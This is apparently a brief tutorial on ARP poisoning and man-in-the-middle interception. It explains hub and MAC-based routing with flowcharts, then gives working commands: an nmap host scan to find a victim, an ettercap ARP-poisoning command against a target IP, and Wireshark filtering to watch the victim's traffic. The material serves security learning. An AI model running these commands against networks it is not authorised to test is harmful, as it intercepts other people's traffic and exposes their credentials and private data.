MiTM Attack


sudo apt install wireshark
sudo apt install nmap
sudo apt install ettercap-text-only


Old Router Communication Method
flowchart LR Z((Internet)) -->|Laptop Msg| A(Router); A -->|Laptop Msg| B[Laptop]; A -->|Laptop Msg| C[Phone]; A -->|Laptop Msg| D[Raspi]; subgraph "Hub" A; end

This old communication method is easy to hack, since it sends the every message with different distinations to everyone. Sniffing (capturing) network traffic thus was easy at the past.

Communication with MAC addresses
flowchart LR Z((Internet)) -->|Laptop Msg| A(Router); A --- C[Phone]; subgraph "Hub, Wireless Access Point" subgraph "MAC filtering" A -->|Laptop Msg| B[Laptop]; end end

ARP Poisoning and MiTM attack


flowchart LR A(Router) -->|"msg \n private ip: 192.168.x.5 \n mac: ABCD"| B[Victim]; B -->|"request \n private ip: 192.168.x.1 \n mac: AAAA"| A; subgraph "ip: 192.168.x.1 \n mac: AAAA" A end subgraph "ip: 192.168.x.5 \n mac: ABCD" B end

After MiTM Attack,

flowchart LR A(Router) -->|"msg \n private ip: 192.168.x.5 \n mac: BBBB"| C[Hacker]; C -->|"msg \n private ip: 192.168.x.5 \n mac: ABCD"| B[Victim]; subgraph "ip: 192.168.x.1 \n mac: AAAA" A end subgraph "ip: 192.168.x.5 \n mac: ABCD" B end subgraph "ip: 192.168.x.10 \n mac: BBBB" C end B -->|"request \n private ip: 192.168.x.1 \n mac: BBBB"| C; C -->|"request \n private ip: 192.168.x.1 \n mac: AAAA"| A;


  1. Identify Victim MAC Address and IP Address.
    nmap -sn
  3. Swap addresses.
    sudo ettercap -T -S -i wlan0 -M arp:remote / /target_ip//
  5. Turn on WireShark to see captured packets. Click on wlan0 → Filter display ip "ip.addr == target ip"
    sudo wireshark


  1. Understanding IP and MAC Addresses: What Are They Good For?
  2. Address Resolution Protocol (ARP)
  3. Wiki -- Man-in-the-middle attack
  4. Ethical Hacking - Sniffing